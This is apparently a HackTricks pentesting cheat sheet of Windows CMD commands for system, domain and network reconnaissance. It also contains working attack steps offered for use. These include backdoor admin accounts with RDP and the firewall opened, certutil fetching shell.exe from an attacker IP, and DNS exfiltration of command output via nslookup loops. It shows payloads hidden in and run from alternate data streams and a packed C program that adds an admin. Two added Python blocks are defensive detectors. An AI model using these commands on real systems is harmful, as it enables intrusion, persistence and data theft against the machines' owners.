# Basic Win CMD for Pentesters
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## System info
### Version and Patches info
```bash
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic computersystem LIST full #Get PC info
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic qfe list brief #Updates
hostname
DRIVERQUERY #3rd party driver vulnerable?
```
### Environment
```bash
set #List all environment variables
```
Some env variables to highlight:
* **COMPUTERNAME**: Name of the computer
* **TEMP/TMP:** Temp folder
* **USERNAME:** Your username
* **HOMEPATH/USERPROFILE:** Home directory
* **windir:** C:\Windows
* **OS**: Windows OS
* **LOGONSERVER**: Name of the domain controller
* **USERDNSDOMAIN**: Domain name to use with DNS
* **USERDOMAIN**: Name of the domain
```bash
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
```
### Mounted disks
```bash
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername
```
### [Defender](authentication-credentials-uac-and-efs/#defender)
### Recycle Bin
```bash
dir C:\$Recycle.Bin /s /b
```
### Processes, Services & Software
```bash
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtasks.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM #Save the output, then grep it on a Linux host
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
```
## Domain info
```bash
# Generic AD info
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
gpresult /V # Get current policy applied
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers
# Users
dsquery user #Get all users
net user /domain #List all users of the domain
net user <username> /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 user
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List users that belong to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domain controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name=\"domain admins\",domain=\"DOMAIN_NAME\"") #Members of the group
# Computers
dsquery computer #Get all computers
net view /domain #List of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
# Trust relations
nltest /domain_trusts #Mapping of the trust relationships
# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
```
### Logs & Events
```bash
#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
```
## Users & Groups
### Users
```bash
#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges
# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user
# Other users logged on
qwinsta #Anyone else logged in?
#Launch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user:<DOMAIN>\<USERNAME> "cmd.exe" ::The password will be prompted
#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe
```
### Groups
```bash
#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators
#Domain
net group /domain #Info about domain groups
net group "<GROUP_NAME>" /domain #Users that belong to the group
```
### List sessions
```
qwinsta
klist sessions
```
### Password Policy
```
net accounts
```
### Credentials
```bash
cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
```
### Persistence with users
```bash
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
# Add user to interesting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
```
## Network
### Interfaces, Routes, Ports, Hosts and DNS cache
```bash
ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Know hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
```
### Firewall
```bash
netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Turn On
netsh firewall set opmode disable #Turn Off
#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed
#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
#Enable Remote assistance:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
```
### Shares
```bash
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
```
### Wifi
```bash
netsh wlan show profile #AP SSID
netsh wlan show profile key=clear #Get Cleartext Pass
```
### SNMP
```
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
```
### Network Interfaces
```bash
ipconfig /all
```
### ARP table
```bash
arp -A
```
## Download
Bitsadmin.exe
```
bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
```
CertReq.exe
```
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
```
Certutil.exe
```
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
```
**Search for `Download` in** [**https://lolbas-project.github.io**](https://lolbas-project.github.io/) **to find more information.**
## Misc
```bash
cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list, bare paths only
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type #Cat file
#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<USERNAME> "cmd.exe" ::The password will be prompted
#Hide
attrib +h file #Set Hidden
attrib -h file #Unset Hidden
#Give full control over a file that you own
icacls <FILE_PATH> /t /grant <USERNAME>:F
icacls <FILE_PATH> /t /remove <USERNAME> #Remove the permission
#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
#exe2bat to transform exe file in bat file
#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)
# Get error messages from code
net helpmsg 32 #32 is the code in that case
```
### Character blacklist bypass
```bash
echo %HOMEPATH:~6,-11% #\
who^ami #whoami
```
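Both bypasses above work because cmd.exe expands `%VAR:~start,len%` substrings and removes escape carets before the command runs. As an added example, not taken from the cheat sheet, this Python normaliser replays both steps so a detection rule can match the plain command; `DEMO_ENV` is a constructed environment, and the substring semantics are those of cmd.exe (negative start counts from the end, negative length stops that many characters before the end).

```python
from __future__ import annotations
import re

# cmd.exe substring expansion, %NAME:~start% or %NAME:~start,len%, and plain %NAME%
_SUBSTR = re.compile(r"%(\w+):~(-?\d+)(?:,(-?\d+))?%")
_PLAIN = re.compile(r"%(\w+)%")

def cmd_substring(value: str, start: int, length: int | None = None) -> str:
    """%VAR:~start,len%: negative start counts from the end, negative len stops before it."""
    n = len(value)
    begin = max(0, min(n, n + start if start < 0 else start))
    if length is None:
        end = n
    elif length < 0:
        end = n + length
    else:
        end = begin + length
    return value[begin:max(begin, min(end, n))]

def strip_carets(cmdline: str) -> str:
    """Drop escape carets outside double quotes (who^ami -> whoami)."""
    out, quoted, i = [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            quoted = not quoted
        elif ch == "^" and not quoted and i + 1 < len(cmdline):
            i += 1                  # keep the escaped character, drop the caret
            ch = cmdline[i]
        out.append(ch)
        i += 1
    return "".join(out)

def normalize(cmdline: str, env: dict[str, str]) -> str:
    """Expand variables (case-insensitive names, unknown ones stay literal), then strip carets."""
    lookup = {k.upper(): v for k, v in env.items()}
    def sub(m: re.Match) -> str:
        val = lookup.get(m.group(1).upper())
        if val is None:
            return m.group(0)
        length = int(m.group(3)) if m.group(3) is not None else None
        return cmd_substring(val, int(m.group(2)), length)
    expanded = _SUBSTR.sub(sub, cmdline)
    expanded = _PLAIN.sub(lambda m: lookup.get(m.group(1).upper(), m.group(0)), expanded)
    return strip_carets(expanded)

# Constructed environment for the demo; HOMEPATH is what the trick above slices.
DEMO_ENV = {"HOMEPATH": "\\Users\\Administrator", "windir": "C:\\Windows"}
```

Feed the normalised string, not the raw command line, to whatever keyword rule looks for `whoami` or `net user`, otherwise a single caret defeats it.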
### DOSfuscation
Generates an obfuscated CMD line.
```powershell
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
```
### Listen address ACLs
You can listen on [http://+:80/Temporary\_Listen\_Addresses/](http://+/Temporary\_Listen\_Addresses/) without being administrator.
```bash
netsh http show urlacl
```
### Manual DNS shell
**Attacker** (Kali) must use one of the following two options:
```bash
sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst host <attacker_ip> #Passive
```
#### Victim
**`for /f tokens`** technique: this lets us run a command, take the first X words of each line of its output and send them to our server via DNS.
```bash
for /f %a in ('whoami') do nslookup %a #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i #Same as last one
```
You can also **redirect** the output and then **read** it.
```
whoami /priv | findstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i
```
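Both `for /f` variants above produce one DNS lookup per output line, with the output words as the labels of the query name. As an added example written from the defender's side (not part of the cheat sheet), this Python script flags such queries in a resolver log: labels that are not legal hostname labels, privilege and identity words, and a burst of distinct names from one client. The log format `<ISO time> <client ip> <query name>` and the sample lines are constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime

# RFC 1123 hostname label; anything else (empty, '\', '(x86)') came from command output
_LABEL = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.I)
# words that whoami, dir and "whoami /priv" output turn into query labels
_OUTPUT_WORDS = {"enabled", "disabled", "authority", "program", "files", "users", "windows"}

def label_reasons(qname: str) -> list:
    """Why one query name looks like for/f output; [] when it does not."""
    labels = qname.rstrip(".").split(".")
    reasons = []
    bad = [l for l in labels if not _LABEL.match(l)]
    if bad:
        reasons.append(f"non-hostname labels {bad}")
    words = [l for l in labels if l.lower() in _OUTPUT_WORDS or re.fullmatch(r"Se\w+Privilege", l)]
    if words:
        reasons.append(f"command-output words {words}")
    return reasons

def detect(lines, burst: int = 5, window_s: int = 60) -> dict:
    """Group queries per client; flag suspicious names and bursts of distinct names."""
    per_client = defaultdict(list)
    for line in lines:
        ts, client, qname = line.split(maxsplit=2)
        per_client[client].append((datetime.fromisoformat(ts), qname))
    findings = {}
    for client, queries in per_client.items():
        hits = [(q, label_reasons(q)) for _, q in queries]
        hits = [(q, r) for q, r in hits if r]
        times = sorted(t for t, _ in queries)
        distinct = len({q for _, q in queries})
        # the loop fires one lookup per output line, so the names arrive as a burst
        if distinct >= burst and (times[-1] - times[0]).total_seconds() <= window_s:
            hits.append(("*", [f"{distinct} distinct names within {window_s}s"]))
        if hits:
            findings[client] = hits
    return findings

# Constructed resolver log for the demo: "<ISO time> <client ip> <query name>"
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 desktop-1\\bob.corp.local
2024-05-01T10:00:01 10.0.0.5 PerfLogs...corp.local
2024-05-01T10:00:01 10.0.0.5 Program.Files.(x86).corp.local
2024-05-01T10:00:02 10.0.0.5 SeShutdownPrivilege.Shut.down.the.system.Enabled....corp.local
2024-05-01T10:00:02 10.0.0.5 SeChangeNotifyPrivilege.Bypass.traverse.checking.Enabled....corp.local
2024-05-01T10:00:03 10.0.0.7 www.example.com
2024-05-01T10:05:00 10.0.0.7 mail.example.com
""".splitlines()
```

`detect(SAMPLE_LOG)` returns findings only for 10.0.0.5: every one of its five names trips a label rule and together they form a burst, while the two ordinary lookups from 10.0.0.7 are left alone.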
## Calling CMD from C code
```c
#include <stdlib.h> /* system, EXIT_SUCCESS, EXIT_FAILURE */
// When executed by Administrator this program will create a user and then add it to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe
int main(void) {
    int i;
    i = system("net users otherAcc 0TherAcc! /add");
    if (i != 0)
        return EXIT_FAILURE; /* user creation failed, no point in adding it to the group */
    i = system("net localgroup administrators otherAcc /add");
    return (i == 0) ? EXIT_SUCCESS : EXIT_FAILURE;
}
```
## Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)
**Examples taken from** [**https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f**](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)**. There are many more in there!**
```bash
## Selected Examples of ADS Operations ##
### Adding Content to ADS ###
# Append executable to a log file as an ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
# Download a script directly into an ADS
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
### Discovering ADS Content ###
# List files and their ADS
dir /R
# Use Sysinternals tool to list ADS of a file
streams.exe
### Extracting Content from ADS ###
# Extract an executable stored in an ADS
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
### Executing ADS Content ###
# Execute an executable stored in an ADS using WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
# Execute a script stored in an ADS using PowerShell
powershell -ep bypass - < c:\temp:ttt
```